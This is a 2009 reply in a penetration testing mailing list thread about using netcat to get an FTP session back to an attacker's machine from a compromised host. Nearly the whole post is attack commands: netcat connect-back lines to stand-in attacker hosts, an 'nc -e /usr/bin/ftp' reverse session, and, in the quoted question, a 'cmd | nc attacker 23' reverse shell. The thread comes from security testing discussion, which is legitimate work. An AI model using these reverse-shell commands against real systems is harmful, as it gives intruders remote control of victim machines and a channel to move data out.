Penetration Testing mailing list archives

Re: Netcat reverse shell and ftp

From: anastasiosm () gmail com
Date: 25 Jan 2009 15:14:55 -0000

Avaya,

ATTACKER: FTP server is running on his box and listens on port 23
VICTIM: nc -vv ftp.attacker_box.com listening_port_23
220 FTP server ready
USER attacker_username_on_ftp
331 Password required for attacker_username_on_ftp
PASS attacker_password_on_ftp
230 ftp.attacker_box.com welcome message
230 user attacker_username_on_ftp logged in
now type help on the prompt to see the available commands

or

ATTACKER: nc -vv -l -p listening_port_xyz
VICTIM: nc -vv ftp.attacker.com listening_port_xyz -e /usr/bin/ftp
now to connect type on the prompt open localhost
enter your credentials (username/password) as shown above and you should be in

don't thing I have missed anything but let us know anyway



2009/1/24 Avaya.Toons <avaya.toons () gmail com>
- Show quoted text -

    Hello all,
    Can any one show me how an intruder could ftp back to his machine
    using a reverse nc session.
    The ftp server back in the attacker machine needs authentication.

    attacker>nc -L -P 23

    victim>cmd | nc attacker 23





-- 
AM

Current thread:

Re: Netcat reverse shell and ftp, (continued)
- Re: Netcat reverse shell and ftp Adriel T. Desautels (Jan 26)
- Re: Netcat reverse shell and ftp César García (Jan 26)
- Re: Netcat reverse shell and ftp David Howe (Jan 26)
  - Re: Netcat reverse shell and ftp Avaya.Toons (Jan 27)
  - RE: Netcat reverse shell and ftp Glafkos Charalambous (Jan 27)
    - Re: Netcat reverse shell and ftp Avaya.Toons (Jan 28)
  - Message not available
    - Re: Netcat reverse shell and ftp David Howe (Jan 27)
    - Re: Netcat reverse shell and ftp Avaya.Toons (Jan 27)
    - Re: Netcat reverse shell and ftp René Østensen (Jan 28)
    - RE: Netcat reverse shell and ftp Glafkos Charalambous (Jan 28)
- Re: Netcat reverse shell and ftp anastasiosm (Jan 26)